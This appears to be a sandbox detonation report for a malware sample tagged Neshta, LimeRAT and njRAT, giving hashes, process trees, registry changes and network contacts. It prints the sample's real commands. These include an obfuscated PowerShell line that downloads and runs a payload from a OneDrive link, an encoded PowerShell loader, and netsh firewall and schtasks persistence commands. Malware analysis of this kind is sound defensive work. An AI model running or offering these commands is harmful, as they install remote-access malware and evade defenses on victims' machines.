| SHA512 | 1f3e3bf1612a4868a7ad1b17dc96624e8152a55c317cc664f77dcde8c453ee407ca725ac04e09bd78232f99022d3310c6d727256395888196d61d25010c2791e |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe
| MD5 | cce8964848413b49f18a44da9cb0a79b |
| SHA1 | 0b7452100d400acebb1c1887542f322a92cbd7ae |
| SHA256 | fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5 |
| SHA512 | bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
| MD5 | 92dc0a5b61c98ac6ca3c9e09711e0a5d |
| SHA1 | f809f50cfdfbc469561bced921d0bad343a0d7b4 |
| SHA256 | 3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc |
| SHA512 | d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31 |
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE
| MD5 | 3ad3461ef1d630f38ed3749838bbedc3 |
| SHA1 | 8d85b0b392ae75c5d0b004ee9cf5a7b80b1b79e6 |
| SHA256 | 32be2bca2b848da78c02140a288f1bb771cb66757f90d20126b1bcfd5bb40e62 |
| SHA512 | 0e95e5181eab14d5820a3a4952018ac9b290fa3b17add8a5e13d893052f1d2a90a2323c62843f6a9e9af00f27e00108b60e0bce2f848e0a4d8ce0cce153db1ba |
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE
| MD5 | a6e53bba7581f77c0a0624b82caff875 |
| SHA1 | a53cce0d23e2cae98a15c67791cf573faecb7b94 |
| SHA256 | c8c9eebf6dadaa6d433bec14a9b9aa521b3b7ecdd74df542aa2cee9cd5f0725b |
| SHA512 | 8a1b5f6b47186611dcfc3ed8b84a76c4d0a099ae24bfdb906b128f1f288a92cacfaf36610579fe26743c2943615f89954bb23937f88e744c6af53eda74e8f92e |
C:\PROGRA~2\Google\Update\DISABL~1.EXE
| MD5 | 2a226fd810c5ce7b825ff7982bc22a0b |
| SHA1 | 58be5cb790336a8e751e91b1702a87fc0521a1d8 |
| SHA256 | af9e01dab96c2a54e2751a0d703cc55fdcc5ac00c40f0be2e13fd85c09b66132 |
| SHA512 | f122ce37b07871b88e322b0ca2e42f3170704d4165167d6d7b02883da9d2be5d2d62bdbd9f7e18d1c0c5e60e9e707a3b64ddb99150c99028333818dfa769deeb |
C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE
| MD5 | 22913149a9d766c415c21e613e4e1d1b |
| SHA1 | 36b33b1ab48615ebe7bd25472d50ba3de56a21c6 |
| SHA256 | 495ac0a638059cb60b2eebf3ac5e8fd17d5fbc7424195308f19e2ffeac3e0ced |
| SHA512 | d9e5396bb24e3ad7ba31b45e8e1bfeb74c32895ab3af6544715c5db04da0442fafd82b06c49a920d964cf0a8fac7a58ccef4a173f1a5879c6733748edc180b14 |
C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE
| MD5 | ad0efa1df844814c2e8ddc188cb0e3b5 |
| SHA1 | b1a8a09f2223aab8b8e3e9bc0e58cc83d402f8ab |
| SHA256 | c87fd5b223cb6dc716815b442b4964d4670a30b5c79f4fb9f1c3a65ec9072e5a |
| SHA512 | 532cc173d9ef27098ff10b6b652c64231b4a14f99df3b5de2eb1423370c19590e2a6032023d3ed02e2080f2f087b620ebbbd079e4a47a584ef11f3eaa0eb8520 |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE
| MD5 | ae277ffe2e22ad48fe50d56172a234c5 |
| SHA1 | 44034bf0485fa5819ac3229c4db152d2a22d7e2d |
| SHA256 | 5f4bf2ce22ce6fdcafbbd7fe7efab3720bcac37a20a838ac203b45fca2537173 |
| SHA512 | b72c93a99d63605931d712a08ffab83067af7f65df3848313a45679948facba94e779a3d01a0e4d57a54fc337662562034c3194a3702cfbb15b6e37866269a9e |
C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe
| MD5 | 7975e085c5990e5f6cce33801d3c1e74 |
| SHA1 | 00ef175713841b92c214ffc01a7ce75b1283a78f |
| SHA256 | 746df41a73e931f422c88a3c65bf59a904f174d5899dfd16ef2841d7f05c1aa3 |
| SHA512 | 857f503fbed30f414249e280117531341f8381326046672db333f1f39fd19e80ee4129447a5d2344ae5edd90b711e51f649a3c2924f844e57c11fffefb438c60 |
memory/1836-201-0x0000000000000000-mapping.dmp
C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE
| MD5 | 73674d8ffd1478d2a201490bb8256531 |
| SHA1 | 951e809b56c4a10be646c55bde6d20acf193db5b |
| SHA256 | ee6da460a81786c5a7520e7320e82572ad62c3b052f4f606fc7c3150b01add61 |
| SHA512 | 978b4bf8200ccca62200a951afe3e6256a5fa463bf9857ee57cf66d03a67a7c386aea6145800d8a046395bfc46452113caf02084785bb87cb9b9f6f27c7cc176 |
C:\Users\Admin\AppData\Roaming\Monitor.exe
| MD5 | 9a3a6d3562b8b2f6794acba836aefdb7 |
| SHA1 | 317ba6fe78187d043dcef3828c18f29ec75e9502 |
| SHA256 | 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac |
| SHA512 | 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc |
C:\Windows\directx.sys
| MD5 | 3cff50701db04d976ef7487e1634ab3f |
| SHA1 | ec4938af2581a594f399397240494e012f8e188f |
| SHA256 | fa8938db5dffe579f591d590f31b7998b39a5eadfdde8be1fb18b409365a6b64 |
| SHA512 | a02e15f555b3ea906f5212ceea523108925accc322bdbe1540767cad9e02cd74096bbbb29fcb1140c7e158feac1fb058873b03f9fe19207e76c5a2f1728598af |
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/2828-203-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 1a98c96379750e31022b6ee804f79fbb |
| SHA1 | dc5224df726f8bf847b62bef2cd822c2c0b72b7f |
| SHA256 | 8dd25ed4b2ae1367264d8e861a82eedd1f9802376fdaf156a2b8d4ccb846fd13 |
| SHA512 | 41677fcfee741fd0281ede2f694c4d79346c3d0c7aaa2ee6ba861a363730fe6767a501323aad593ca5e2198b7e2a1307d5c78dba9799181a23330f1319839b21 |
C:\Users\Admin\AppData\Roaming\Monitor.exe
| MD5 | 9a3a6d3562b8b2f6794acba836aefdb7 |
| SHA1 | 317ba6fe78187d043dcef3828c18f29ec75e9502 |
| SHA256 | 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac |
| SHA512 | 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc |
memory/1092-208-0x0000000000000000-mapping.dmp
memory/1092-210-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\images.exe
| MD5 | 7c671968b82daecfb05b738fa74bb02c |
| SHA1 | 4012dfb514490f5b1ee115e9d0c70a73d5a4b0e1 |
| SHA256 | 20f4673b175fa07f785c92829353d875782c9c10dd0905d85513f0ff6193c48c |
| SHA512 | c349707edc5cbfe92a8b741e8bbecad7e9a575030acb2613c16fe4431dc8dd62abe2265d53fe46ec7114c9a3d30599060615de2d50e4b09d6e7837265d91decf |
C:\Users\Admin\AppData\Roaming\Sound.exe
| MD5 | 022e5206b32c7916e540ef6ab66e1ed8 |
| SHA1 | a72131dd1820c06b406e7bd7f1d5b7f06224cfd5 |
| SHA256 | 76848283ddd18ac087bdf88aa80f8117583d470e8cda06b8e7e69a49f62e54c4 |
| SHA512 | fe82efc82fdf89ee17ef8f5d50273d232bf43d6f0a3a6558b26c0682c1dc0834006cdd2b1f5be07fdb1224794da56c6d230a6668393b8995afabd39159472552 |
C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\VCREDI~1.EXE
| MD5 | 07e194ce831b1846111eb6c8b176c86e |
| SHA1 | b9c83ec3b0949cb661878fb1a8b43a073e15baf1 |
| SHA256 | d882f673ddf40a7ea6d89ce25e4ee55d94a5ef0b5403aa8d86656fd960d0e4ac |
| SHA512 | 55f9b6d3199aa60d836b6792ae55731236fb2a99c79ce8522e07e579c64eabb88fa413c02632deb87a361dd8490361aa1424beed2e01ba28be220f8c676a1bb5 |
C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE
| MD5 | 87f15006aea3b4433e226882a56f188d |
| SHA1 | e3ad6beb8229af62b0824151dbf546c0506d4f65 |
| SHA256 | 8d0045c74270281c705009d49441167c8a51ac70b720f84ff941b39fad220919 |
| SHA512 | b01a8af6dc836044d2adc6828654fa7a187c3f7ffe2a4db4c73021be6d121f9c1c47b1643513c3f25c0e1b5123b8ce2dc78b2ca8ce638a09c2171f158762c7c1 |
C:\Users\ALLUSE~1\PACKAG~1\{61087~1\VCREDI~1.EXE
| MD5 | e2df3732ca93daaa5df4792582b9679b |
| SHA1 | 9b4e628fcaa2e279969bf293862ebe03d86ee0bb |
| SHA256 | f1f928a9bef534c20a3ee922e25d7505ac132479b5f3c50ddf17ab919de70ad6 |
| SHA512 | 780f9630984cd6cb91e27fbd4eb6c24bb03464b1d15643dbaed009c4d78b0359bc60f931bfbae098b3c845a00cb3be89a512b2c98250d2cc7adcf93cbf2f9221 |
C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\VC_RED~1.EXE
| MD5 | 8819397a5eaf67562bc112865fcd2012 |
| SHA1 | 8fe2cef160b7ffca85c03426c14b16e08021f9e0 |
| SHA256 | d05cec6f8c0b94a23a74cc9339980d78ec69d9febfc5d93374ca9e59fc7cc61f |
| SHA512 | 4707ca2899bf048dd1f19d39e74a5e04eef6ad90692b4dca9f88f10d4e37786756e2826cf2486eb489d2e6dbcf45e8608c447948827bc234e6a43843b0ff447e |
C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\VC_RED~1.EXE
| MD5 | 61fb43bb8a23ca0317d9c292e6b690e4 |
| SHA1 | b5fb6f3818d6c654d6e6f5c397f776b5d71154a2 |
| SHA256 | c23ecc0f946f8c7011b4acffc8c51889ac6a463a0bbf80f21d353e39390bad59 |
| SHA512 | d43eaf4f443a2404b3060510fd646352d0ae00b99bbfe2187afa0316b61fa0850b1cb4c6d5514573b779c7b574fbc706563407a3e272c50736fb2ad7c4c63772 |
C:\Users\ALLUSE~1\PACKAG~1\{33D1F~1\VCREDI~1.EXE
| MD5 | 86749cd13537a694795be5d87ef7106d |
| SHA1 | 538030845680a8be8219618daee29e368dc1e06c |
| SHA256 | 8c35dcc975a5c7c687686a3970306452476d17a89787bc5bd3bf21b9de0d36a5 |
| SHA512 | 7b6ae20515fb6b13701df422cbb0844d26c8a98087b2758427781f0bf11eb9ec5da029096e42960bf99ddd3d4f817db6e29ac172039110df6ea92547d331db4c |
C:\Users\ALLUSE~1\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE
| MD5 | 3a134f3ed216a0f5821df25379f70d58 |
| SHA1 | f78adaa21dc55b5faa85472796254b1ee15f46b8 |
| SHA256 | 19c35d1bc1033db22bad439759444238ec4fb80def533df4b9204d151dfb6e67 |
| SHA512 | 765084bd69991b2ea33c8a2492c5872cda51e07347813451b31b3533ffd26daf991b0d3cf5bdf579dbbee59eea7dfd2103cd0ffe4115542fe599b1485d22c0fd |
C:\Users\ALLUSE~1\Adobe\Setup\{AC76B~1\setup.exe
| MD5 | dfacbd8fbcd719291963b9f70ea5f74d |
| SHA1 | 4fe106b6ceda9d57c2ae84d9eafaf8a69478f609 |
| SHA256 | 498a3a90eba6f828d3e6248a80160a41a2c3bf0002f335db6f476a53c257dfe9 |
| SHA512 | 0032212d9dd569a34d72096db846e6832dd4fbf4d4e001c2ffa9bbb7af635add2eafaafdf6a475c5c0d040cce11de57523aa7d783d3c0527b0297be5bfa4c0b6 |
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
| MD5 | 9058cdb7b34c5de7f2fd7a3da24eb9e7 |
| SHA1 | 7a8dfbe9243cfcf32047d56189b8bb9f923510e7 |
| SHA256 | c0b5e348c2583583d5a6c07a95e75b11d04fb37513b576e465f5d1411144a767 |
| SHA512 | db0da3bcb5e7ce5221294ff480bafebe786b203d2b20ef97802c217468cb0212b5e7e5766a8b50a053214af3371619743ad2dac7a20095648d482517d788bb2d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 40b81c4b88bffd6f0f746daba43c1abd |
| SHA1 | 85753f0a0e59ff55c3e49df99c07e30b924f2bd3 |
| SHA256 | 6cb48e1a20c2eb4c18e158ae04c5ca8e85bee6c3d0fac32643b478ca99204370 |
| SHA512 | 1fe1b326bf97a17ce808f8502ed0597dac186dfe5128505ee38ab4457cd643fd538e53dab76a5e2f5b7b7e7697e074ea488c06fb8b1cc6405e0d1a4e80b7897d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 93e6e19ed89d05b89f0166f04800295d |
| SHA1 | 132c05b6c599ed3f44d229c696fb3314cf274b78 |
| SHA256 | 19c700422f16619af151c055a6f6536a2ea8c7afe2bc70997684dd4ac55e739d |
| SHA512 | c14b18db6c0aececa28ba08c3a26756c68e6d497e6bc41a94a4fd493f1f9c813869cc446ac3c134997cbcd98004a2721cef8d4fbb28cb14051ab31cfa1d61de4 |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-24 03:38
Reported
2022-05-24 03:42
Platform
win7-20220414-en
Max time kernel
21s
Max time network
178s
Command Line
Signatures
Detect Neshta Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LimeRAT
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
Neshta
njRAT/Bladabindi
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\images.exe | N/A |
Modifies Windows Firewall
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\images.exe"
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
C:\Users\Admin\AppData\Roaming\images.exe
C:\Users\Admin\AppData\Roaming\images.exe
C:\Users\Admin\AppData\Roaming\Sound.exe
C:\Users\Admin\AppData\Roaming\Sound.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\svcripts.vbs"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Sound.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\scripts.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\script.js"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')
C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA
C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 636
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Data.exe"
C:\Users\Admin\AppData\Roaming\Data.exe
C:\Users\Admin\AppData\Roaming\Data.exe
C:\Windows\system32\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Data.exe" "Data.exe" ENABLE
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Monitor.exe'"
C:\Users\Admin\AppData\Roaming\Monitor.exe
C:\Users\Admin\AppData\Roaming\Monitor.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Monitor.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 8.8.8.8:53 | chopa.mywire.org | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| ES | 81.61.77.92:8000 | tcp | |
| US | 8.8.8.8:53 | rnqkma.bn.files.1drv.com | udp |
| US | 13.107.42.12:443 | rnqkma.bn.files.1drv.com | tcp |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| ES | 81.61.77.92:5553 | tcp |
Files
memory/904-54-0x00000000764C1000-0x00000000764C3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
| MD5 | 9bc3a910746cc9474e22bf5893b167af |
| SHA1 | 1ce4c754b9e94bd89e09dbd38071739ef276f91d |
| SHA256 | a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00 |
| SHA512 | 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d |
memory/1324-56-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
| MD5 | 9bc3a910746cc9474e22bf5893b167af |
| SHA1 | 1ce4c754b9e94bd89e09dbd38071739ef276f91d |
| SHA256 | a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00 |
| SHA512 | 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d |
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
| MD5 | 9bc3a910746cc9474e22bf5893b167af |
| SHA1 | 1ce4c754b9e94bd89e09dbd38071739ef276f91d |
| SHA256 | a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00 |
| SHA512 | 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d |
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
| MD5 | c7ec2f35a541aace005fa867f73bb1af |
| SHA1 | 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad |
| SHA256 | 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358 |
| SHA512 | b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df |
memory/108-66-0x0000000000000000-mapping.dmp
memory/1888-76-0x0000000000000000-mapping.dmp
memory/1808-78-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\images.exe
| MD5 | 9a3a6d3562b8b2f6794acba836aefdb7 |
| SHA1 | 317ba6fe78187d043dcef3828c18f29ec75e9502 |
